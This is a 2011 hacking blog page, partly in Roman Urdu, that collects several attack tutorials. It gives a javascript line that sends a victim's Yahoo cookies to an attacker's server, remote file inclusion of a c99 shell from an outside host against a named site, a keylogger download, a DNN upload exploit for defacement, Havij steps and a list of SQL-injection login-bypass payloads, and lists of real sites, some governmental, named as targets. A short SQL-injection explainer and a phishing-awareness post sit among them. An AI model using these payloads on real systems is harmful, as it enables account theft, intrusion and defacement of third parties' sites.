Latest: Facebook Like Our Facebook Page For More Updates! | Twitter: @Tech_Terms
Showing posts with label Web hacking. Show all posts
Showing posts with label Web hacking. Show all posts

Saturday, 27 August 2011

Hack Yahoo accounts with Session IDs or session cookies".

Hack Yahoo accounts with Session IDs or session cookies".


What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out. 

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Saturday, 13 August 2011

Make Your FacebOOk account and Page Secure.





I am writing this articles for those who are not familiar with Phising Attack(fake page) & Social Engeneering Attack which can 100% hack your accounts.


Many Fans of my facebook page came with the same question that our facebook page is hacked please bring it back ......  


So their Answer is Soory... Because when a page is hacked It cant be back. There are no facebook policies to return your page. 


The only ways to get it back
1) You can get it back only if the hackers returns it himself to you..
2) Or Hack him by his method and get back Your page.


HOW YOUR PAGE HACKED????
There is one ways to hack your Page.
1) One any Only way to hack a page is through Your facebook account.


YOUR ACCOUNT WILL HACKED BY THREE WAYS BUT THEY ARE POSSIBLE ONLY DUE TO YOUR CARELESSNESS AND FAULTNESS.


PHISHING ATTACK:
Many people are sick of wanting hundred's of fans for thier page. 
On promoting page he use the following words:


1) do n get
2) S4s?
3) Shared now do mine
Or whatever You use.


NOW,
If some one said you to do n get, s4s or
OPEN THAT PAGE AND LOGIN YOU WILL GET 2000+ fans or what ever amount of fans.(Most commonly used)
When You open his given link for promoting.
and then if u will get facebook login page then donot login in that page, am saying again donont login that facebook page. If you login that page you will 100% hacked.
Your facebook e-mail id and passwords will sent through that login page to the hacker if u logged in.


These pages are same to same as facebook login page.


Example:
1) www.ahmedijaz.phpnet.us
2) http://myfacebookcam.tk/  (Free domain of above one)
ETC. . . . 


                      <<<<<<DONOT LOGIN THAT PAGE>>>>


If u are hacked then you can get back your account by forgotting password option.
Then gives You email account . Facebook will send a email to ur account.


One More Precaution is donont make a same password on differnet sites like yahoo, facebook, gmail, hotmail etc. Beacause if ur facebook will hack and you have same pasword of login emaillike yahoo, gmail etc. then your email account will also be hacked.


NOW IF UR ACCOUNT HACKED THE HACKER JUST CHANGE THE ADMIN OF YOUR PAGE , REMOVE YOU AND ADD HIMSELF.... AND THAT'S WHY YOUR PAGE HACKED.......


Last thing dont make many admins of your page. 




Other ways to hack your account is Social Engeneering 
CLICK ME TO SEE ARTICLE ON SOCIAL ENGENEERING


And KeyLoggers. I will write a tutorial on keylogger soon but phishing and Social Engeneering are commonly used so i write on this now.


Vizit my site for more hacking and security tutorials:
www.PakHack.com 


MY FACEOOK PAGE:
Mobile, Pc and Internet Tips And Tricks

IF ANY PROBLEM?? Then feel free to ask


REGARDS:
__RDX__

Friday, 12 August 2011

How to Hack site Using Remote File Inclusion


How to Hack site Using Remote File Inclusion


Another website attack named Remote file inclusion is basically a one of the most common vulnerability found in webapplication. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.



Searching the Vulnerability
Remote File inclusion vulnerability is usually occurred in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything


To find the vulnerability the hacker will most commonly use the following Google Dork
"inurl:index.php?page=”

This will show all the pages which has "index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Let’s say that the target website is http://www.cbspk.com

So the hacker URL will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com



If after executing the command the homepage of the google shows up then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell.
I would use c99 shell.
The hacker would first upload the shells to a web hosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Let’s say that the URL of the shell is

http://h1.ripway.com/yourdomain/c99.txt


Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/yourdomain/c99.txt?
Remember to add "?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he
could do anything with it....

Thursday, 11 August 2011

Keylogger For Linux backtrack Most useful and working Keylogger




Download: http://www.ziddu.com/download/15382851/lkl-0.1.1.tar.gz.html

Installation:

The 'configure' shell script attempts to guess correct values for various system-dependent variables used during compilation.

It uses those values to create a 'Makefile' in each directory of the package. It may also create one or more '.h' files containing system-dependent definitions.

Finally, it creates a shell script 'config.status' that you can run in the future to recreate the current configuration, a file 'config.cache' that saves the results of its tests to speed up
reconfiguring, and a file 'config.log' containing compiler output (useful mainly for debugging 'configure').

If you need to do unusual things to compile the package, please try to figure out how 'configure' could check whether to do them, and mail diffs or instructions to the address given in the 'README' so they can be considered for the next release.

If at some point 'config.cache' contains results you don't want to keep, you may remove or edit it.

The file 'configure.in' is used to create 'configure' by a program called 'autoconf'. You only need 'configure.in' if you want to change it or regenerate 'configure' using a newer version of 'autoconf'.

The simplest way to compile this package is:

1. 'cd' to the directory containing the package's source code and type './configure' to configure the package for your system.

If you're using 'csh' on an old version of System V, you might need to type 'sh ./configure' instead to prevent 'csh' from trying to execute 'configure' itself.

Running 'configure' takes awhile. While running, it prints some messages telling which features it is checking for.

2. Type 'make' to compile the package.

3. Optionally, type 'make check' to run any self-tests that come with the package.

4. Type 'make install' to install the programs and any data files and documentation.

5. You can remove the program binaries and object files from the source code directory by typing 'make clean'. To also remove the files that 'configure' created (so you can compile the package for a different kind of computer), type 'make distclean'.

There is also a 'make maintainer-clean' target, but that is intended mainly for the package's developers. If you use it, you may have to get all sorts of other programs in order to regenerate files that came with the distribution.

Social Engineering | 100% attack |


Why use Social Engineering?
The reasons for using social engineering to gain access are simple: once mastered, social engineering can be used on a system despite the platform or the quality of the hardware and software present. Social engineering comes in many forms, but they are all based on the principle of disguising oneself as a non-hacker who needs or deserves the information to gain access to the system. Aside from user larger security systems, another tactic that security professionals employ is ‘security through obscurity,’ which is providing little or no information to a user, assuming that legitimate users have already been trained, and that the hackers would be discouraged by having to guess different commands or procedures. Security through obscurity methods can also be accomplished by hiding certain files or information systems or having confusing login prompts. This method of security is completely undermined when social engineering is involved. With a legitimate human user providing information, all the information that allowed for security through obscurity would also be divulged to the hacker.
Methods of Attack
Although the methods used by social engineers rely on the same principle, the disguises of the hackers may vary greatly, depending on the hacker’s level of skill and the type of information he or she is after. One common method used is for the attacker to pretend he is new to the system and needs assistance with gaining access. The role as a new person (or ‘newbie’ or ‘neophyte’) is easy for a potential hacker to pull off. The hacker can easily pretend to not know much about a system and still retrieve information. This ruse is commonly used when the attacker is unable to research enough about the company or find enough information to get a foot in the door. A simple method of this technique is for the hacker to call a secretary for the company and pretend that he is a new temp agent and is having trouble gaining access into the system. The secretary (or other legitimate user) may be inclined and proud to be able to offer help to the new person on the job. The user may simply give out the guest account name and password, or may even go into detailed instructions on login procedures for different departments. Once the intruder is in a guest account however, he may be able to access other (more important) accounts from there. He may also be able to find out enough information about the company to use a similar tactic: reverse social engineering, which is covered in the next section.
Other guises used by social engineers are to pose as a computer aide or helper, and try to gain information as you fix the computer. This technique, however, relies on the assumption that there is something wrong with the computer system. By posing as a helper, the legitimate user will be less suspicious and more willing to answer your inquisitive questions. Another form for the attacker to take is that of a system operator for the network itself. The potential hacker will pretend that an error in all the accounts has been made, and the he needs to reset the accounts. In order to do that, he needs the old passwords of the users. If the employee is naive enough, he or she will divulge the information, thinking that they are doing their company a service. Although there are many other methods and techniques, these previous examples account for most recorded incidents of social engineers.
The disguises and tricks that the hackers use to social engineer legitimate users do have limits, however. During a social engineering attack, the hacker assumes a great deal and also relies on luck to pull off a successful hack. The above examples usually only work on employees who are not aware of the different forms of social engineering, or that they don’t care about the company’s security. Even if an employee is not aware of social engineering, he or she may not trust who the hacker is without proper identification. The employee may also be aware that temp agents usually have contact managers or other people within their own office to assist them, and would be suspicious when the call comes to their desk. These problems are a constant danger to the potential hacker, which has called for a new type of social engineering- called reverse social engineering.
Reverse Social Engineering
Reverse social engineering is a superior form of social engineering that deals with the common difficulties that come with normal social engineering. This form can be described as a legitimate user of a system asking the hacker questions for information. In reverse social engineering (RSE), the hacker is thought to be a higher-level that the legitimate user, who is actually a target. In order to pull of an RSE attack, however, the attacker must be knowledgeable of the system and usually must also have previous access granted to him, usually through normal social engineering. A quick glance of the some pros and cons of SE and RSE are given here:
Social Engineering: The hacker places the calls and is dependent on the user
Reverse Social Engineering: The user places the calls and are dependent the hacker
Social Engineering: The user feels that the hacker is indebted to them.
Reverse Social Engineering: The user feels indebted to the hacker.
Social Engineering: Questions often remain unresolved to the victim.
Reverse Social Engineering: All the problems are corrected, no suspicious loose ends
Social Engineering: The user has control by providing information.
Reverse Social Engineering: The hacker has complete control.
Social Engineering: Little or no preparation required.
Reverse Social Engineering: Lots of planning and previous access usually needed.
The typical RSE attack consists of three major parts: sabotage, advertising, and assisting. After gaining simple access through other means, the hacker sabotages a workstation by either corrupting the station, or giving the appearance that it is corrupted. An abundance of error messages, switched parameters/options, or simulation programs such as fake prompts can accomplish this type of sabotage. The user of the system sees the malfunctions, and then tries to seek help. In order to be the one that the users call, the attacker must advertise that he or she is capable of fixing the problem. Advertising may include placing fake business cards around the office or even providing the number to call in the error message itself. A sample error message might be:
** ERROR 03 – Restricted Access Denied ** – File access not allowed by user. Consult with Mr. Crack at () 595-1474 for file permission information.
In this case, the user would call ‘Mr. Downs’ for help, and divulge account information without being suspicious of the legitimacy of ‘Mr. Downs.’ Another method of advertisement can actually involve social engineering. An example of this is for the hacker to call the target and inform them that the new technical support number has changed, and then the hacker would give them their own number. The third (and easiest) part of an RSE attack is for the hacker to assist with the problem. Since the hacker is the instigator of the sabotage, the problem is easily fixed, and the target is not suspicious of the helper since he or she appears to be a knowledgeable user of the system. The duty of the hacker is only to get account information out of the target while he is helping them. After the information is attained, the hacker solves the problem and then ends the conversation, eager to use his new found knowledge.
Why Social Engineering Works
The use of social engineering and reverse social engineering are common because they often work under good conditions and take less time (and sometimes less knowledge) to pull off than brute-force attacks. They work because all humans have certain psychiatric characteristics that can be taken advantage of. Such characteristics are diffusion of responsibility, ingratiation opportunties, and moral duty. Diffusion of responsibility is used when the legitimate user feels that he or she is not solely responsible for their actions, which allows them to give up information more easily. A user may also divulge information if they feel that are doing something that will help them in the future, such as getting their boss out of a jam. Moral duty is played on when the target believes that they are helping the company with a problem, and they are often glad to help. There are other factors that allow social engineers to be successful, such as the use of guilt and personal persuasion.
Methods of Prevention
As social engineering and reverse social engineering become more prevalent, companies and network managers are trying to stop the attacks from being successful. Companies concerned with security realize that the great amounts of money spent on upgrades and security kits are being wasted if they can’t prevent SE and RSE attacks. The simple answer to preventing these attacks is education. A knowledgeable user of a system can easily be told to never give out account information without pen-nission of a supervisor. The users should be aware of the common methods of SE attacks, and should always report suspicious behavior. While catching on to RSE attacks is much harder, the users should still be aware of who to trust when a problem occurs. Since social engineers can attack any employee for information, all employees should be concerned with methods of attacks. Hackers know that low-level employees and users with low company morale are easy targets for giving up information without much thought. These employees must team to care about computer and company security as a whole.
Are You a Social Engineer?
So are you a social engineer? YES! You’re a social engineer even without knowing it! Believe it or not, more than 50% of people living on this Earth subconsciously don’t know what they’re capable of! That’s a scary thought, that’s a lot of potential lost! But with the right direction and approach to your goal, anything is possible! Anything. Don’t let your options deteriorate due to discouragement and with the wrong mindset. The decision is yours to let it happen or not!
Conclusion
All computer systems in the world must rely on human operators that have vulnerable characteristics. No matter how secure the equipment is from electronic invasion, the knowledge extracted from a legitimate user may render a computer network inoperable if used in an unauthorized manner. Hackers try to learn how to manipulate legitimate users into providing valuable network information. Once in, they may even use reverse social engineering to gain further access to the system- this golden method of hacking is easily prevented by education the users to be aware of such attacks, and to use wise judgment when providing others with company information.

SQL WEBSITE HACK COMPLETE DETAILED




I want to show you just one way that hackers can get in to your website and mess it up, using a technique called SQL Injection. And then I'll show you how to fix it. This article touches on some technical topics, but I'll try to keep things as simple as possible. There are a few very short code examples written in PHP and SQL. These are for the techies, but you don't have to fully understand the examples to be able to follow what is going on. Please also note that the examples used are extremely simple, and Real Hackers™ will use many variations on the examples listed.

If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway. If your site does use a database, and has an administrator login who has rights to update the site, or indeed any forms which can be used to submit content to the site — even a comment form — read on.

Warning

This article will show you how you can hack in to vulnerable websites, and to check your own website for one specific vulnerability. It's OK to play around with this on your own site (but be careful!) but do not be tempted to try it out on a site you do not own. If the site is properly managed, an attempt to log in using this or similar methods will be detected and you might find yourself facing charges under the Computer Misuse Act. Penalties under this act are severe, including heavy fines or even imprisonment.

What is SQL Injection?

SQL stands for Structured Query Language, and it is the language used by most website databases. SQL Injection is a technique used by hackers to add their own SQL to your site's SQL to gain access to confidential information or to change or delete the data that keeps your website running. I'm going to talk about just one form of SQL Injection attack that allows a hacker to log in as an administrator - even if he doesn't know the password.

Is your site vulnerable?

If your website has a login form for an administrator to log in, go to your site now, in the username field type the administrator user name.

In the password field, type or paste this:



x' or 'a' = 'a

If the website didn't let you log in using this string you can relax a bit; this article probably doesn't apply to you. However you might like to try this alternative:

x' or 1=1--

Or you could try pasting either or both of the above strings into both the login and password field. Or if you are familiar with SQL you could try a few other variations. A hacker who really wants to get access to your site will try many variations before he gives up.

If you were able to log in using any of these methods then get your web tech to read this article, and to read up all the other methods of SQL Injection. The hackers and "skript kiddies" know all this stuff; your web techs need to know it too.

The technical stuff

If you were able to log in, then the code which generates the SQL for the login looks something like this:

$sql = 
"SELECT * FROM users 
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

When you log in normally, let's say using userid admin and password secret, what happens is the admin is put in place of 
$username
 and secret is put in place of 
$password
. The SQL that is generated then looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'secret'

But when you enter 
x' or 'a' = 'a
 as the password, the SQL which is generated looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x' or 'a' = 'a'

Notice that the string:
x' or 'a' = 'a 
has injected an extra phrase into the WHERE clause:
or 'a' = 'a' 
This means that the WHERE is always true, and so this query will return a row contain the user's details.

If there is only a single user defined in the database, then that user's details will always be returned and the system will allow you to log in. If you have multiple users, then one of those users will be returned at random. If you are lucky, it will be a user without administration rights (although it might be a user who has paid to access the site). Do you feel lucky?

How to defend against this type of attack

Fixing this security hole isn't difficult. There are several ways to do it. If you are using MySQL, for example, the simplest method is to escape the username and password, using the mysql_escape_string() ormysql_real_escape_string() functions, e.g.:

$userid = mysql_real_escape_string($userid);
$password = mysql_real_escape_string($password);
$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

Now when the SQL is built, it will come out as:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x\' or \'a\' = \'a'

Those backslashes ( \ ) make the database treat the quote as a normal character rather than as a delimiter, so the database no longer interprets the SQL as having an OR in the WHERE clause.

This is just a simplistic example. In practice you will do a bit more than this as there are many variations on this attack. For example, you might structure the SQL differently, fetch the user using the user name only and then check manually that the password matches or make sure you always use bind variables (the best defence against SQL injection and strongly recommended!). And you should always escape all incoming data using the appropriate functions from whatever language your website is written in - not just data that is being used for login.

How to Hack Website Using DNN


Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit

First Check whether the Website is vulnerable or not Using Dorks etc..

Or simply copy this code to google and hit enter:

inurl:/portals/0

Open the home page and check any image which is located in /portals/0/ 
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.example.com ..the image is located at location- http://www.example.com/Portals/0/SHM.jpg

Yeah... it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.


Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)


After selecting the third option, replace the URL bar with below script

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT's IT you have hacked the website.

Saturday, 6 August 2011

Hack Site With Havij

Sub Se Pehle http://www.google.com/ PeR JaYeN.


Or iN DorRks Main sE Koi Aik Line GooGle.Com Main Daal Den.

Ab Search Per CLick Karen.


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:preview.php?id=

inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=


(Mazeed Dorks ke liye Neche Attachment main jayen or download karen  file size 2kb)





Ab Jis Tarah Ka Ap Ne Text Format  Likha Hai Isi Tarah Se Search Main Aa Jaye Ga.

In Search Main Har Site Ke Neche Green Colour Ki Line Ho Gi Wo Copy Kar Len.



                       Click Here To Free Download Havij
                  


Ab 'HAVIJ' Software Install Karen.


Jo green colour ka address ap ne copy kiya tha wo HAVIJ SOFTWARE ke 'TARGET' main daalen
Ab ANALYZE per click karen.


Ab kuch wait karen or software ko loading kar ke apna kaam karne den.
Agar result main errors waghaira aa jayen to is ka matlab yeh site seure ho chuki hai
Or is site per koi dosra hacking method lagana parey ga.


Agar result thek aa jaye to is ka matlab yeh site hack ho sakti hai.
Thek result ke baad 'TABLES' per click karen.


Or 'TABLE' per 'MARK' kar ke 'GET COLOUMNS' per CliCk karen.


Ab buhut se 'options/tables' aa jayen gen.


Ap ne jis 'SITE' ko 'ANALYZE' kiya hai us site ke jis data ki zarurat hai
Us per 'MARK' karen or 'GET COLOUMNS' per 'CLICK' kar den.


Hack karne ke liye ap ko sirf 'ADMIN' ke 'LOG-IN NAME' or 'PASSWORD' ki zarurt hai


Isi liye 'ADMIN' per 'MARK' kar ke 'GET COLOUMNS' per 'CLICK' kar den.ab jo 'COLOUMNS'
Aayen un main se 'LOG-IN NAME/iD' aur PASSWORD' ko 'MARK' kar ke 'GET DATA' per 'CLiCK' kar den.(*AGAR ADMIN WALI OPTION NA HO TO KOI DOSRI SITE TRY KAREN)


Ab 'SITE' ke 'ADMIN' ka 'PASSWORD' aur 'LOG-IN NAME/iD' aa jayen gen.un dono ko copy kar len.


Ab 'FIND ADMIN' ke tab per chalen jayen or 'START' per 'CliCk' kar den.


Ab thora neche dekhen gen to aik 'WEB ADDRESS' aaya ho ga us per 'LOG IN' hon.


Yeh wohi 'WEB PAGE' hai jo ap hack kar rahe hain.


Yeh paGe ap se 'PASSWORD & LOG-IN NAME/ID' maang raha ho ga.
Jo 'PASSWORD & LOG IN-NAME/iD' ap ne Copy kiye they wo yahan per Paste kar den.
Or ab ap 'SITE' ke 'ADMIN CONTROL PANEL' main hain or yeh site hack ho chuki hai
Ab ap is site ko 'EDIT' kar ke is main kuch bhi likh den. 

Attachment :---- 
 Click Here To Download Dorks


Plz Comments.

Sql Injecting Byppassing Login

Sql Injecting...


Sub Pehly Ap Google.com Open KarEn
Phir Ap Google.Com Search Bar Mein Type KarEn
In Mein Sy KOi Aik Line Google Search Bar Mein DalEn.




inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp


inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp




Phir Click On Search Button.




Phir Jo Web Search Result Aaye To Ap Web Site URL(Address) Jo Green COlour Mein Ho Ga Us KE
End Mein Wo Lafz Ho Gen Jo Ap Ny Search Kiye Hain wo Hon Gen Us Link Py Click Karen Phir Ap Ke Samney




USER NAME
OR
PASWORD




Wala Page Aa jaye Ga.




Phir Aap USERNAME Mein Type Karen Admin
Ya Koi Sa Bhi Injetion Jo App Pasword Mein Use Ker RAhE Hain
Or PASSWORD Mein Type KAREn Yeh




admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1' OR '1'='1 (Koi Ek Dalna Ha Password Mein)




Phir Click Karen Enter.
Ab Website Hack Ho Gayi Hai.




Ab Ap 'ADMIN PANEL' Mein Inter Ho Gye Hain.
And Ab Start Changing In ADMIN PANEL Jo Ap Chahen Ok'z.




Apna Tajurba Yehan Azmayen.
Aap Test Kerna Chaty Hain To Yehan Karen
Yeh Link OPen Karen http://globaloiljobs.com/Admin_Login.asp


http://globaloiljobs.com/Admin_Login.asp
IS K Admin Id (Username) Mein Type Karen Yeh
1' OR '1'='1
Or
Pasword mein B Yehi Type Keryn
1' OR '1'='1 and




Jis tarah ka injection user name main daalen
bilkul usi tarah ka injection password main bi daalen.




Tip* Sub se zyada kaam karne waley injectiomn yeh hain.


1' OR '1'='1
1'or'1'='1
'or '='




NOTE= YEH METHOD BUHUT OLD HAI OR AJ KAL KI SITES
SECURE HO CHUKI HAIN ISI LIYE YEH METHOD KUCH HI SITE
PER LAGE GA.




Get EnoYyYyYyY in Admin Panel Of The Website.

IIS Exploit (Web Hack)


iis exploit (web hack)
yeh buhut hi easy tariqa hai website hack karne ka or buhut hi small hai.

1.click on start
2.open run or yeh code copy kar ke run main daal den

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

ab ok per clik karen.


ab aik folder open ho ga jis ka naam 'web folders' ho ga.
is folder main right click karen or phir 'new' wale option per ja kar 'web folder' per click karen.

ab aik new window aaye gi wo ap se yeh mange gi 'type the location to add'

ab is main wo site likhen jo ap hack karna chahte hain.

ab ok per click kar den.

is main kuch site hack hon gi or kuch nahin hon gi.agar koi site hack na ho us per koi or method laga den.
main ap ko kuch sites deta hon jo 99% hack ho sakti hain.

Try on these sites..
http://bxsd.ccngov.cn/
http://ccngov.cn/
http://ccngov.net/
http://dfjs.ccngov.cn/
http://hb.ccngov.cn/
http://lianghui.ccngov.cn/
http://sd.ccngov.cn/
http://sjgz.ccngov.cn/
http://sx.ccngov.cn/
http://www.ccngov.cn/
http://xjgz.ccngov.cn/
http://zfjd.ccngov.cn/
http://zfjs.ccngov.cn/
http://zwgk.ccngov.cn/
http://zwlt.ccngov.cn/
http://zygz.ccngov.cn/
http://bbs.hbzjy.cn/
http://china-quality.com.cn/
http://hbzjy.cn/
http://www.china-foodsafe.com.cn/
http://www.china-jjqs.com/
http://www.china-quality.cn/
http://www.china-quality.net/
http://www.china-sports.com.cn/
http://www.hbzjy.cn/
http://www.sohoally.com/
http://x068.com/
http://12407.z6.cn/
http://16342.z6.cn/
http://17679.z6.cn/  



AP 1000+ sites yahan se download karn..
CLICK ME TO DOWNLOAD
  • MBT Icons and buttons

    Tips And Tricks

    Our resources have been successfully got many tricks and tips and shared here too much. Check Yours!

  • choosing webhost for a blog

    Mobile Zone

    Mobile Reviews Shared with thier latest tricks and tips!

  • SEO Settings for blogger

    SEO

    Learn every single SEO tip that will boost your blog's ranking and organic traffic. We got them all!

  • Blogger widgets and plugins

    Check Softwares

    Why not take a tour of all great softwares? You Name it we have it!

  • become a six figure blogger!

    Get Facebook Tricks

    Learn Facebook Tricks!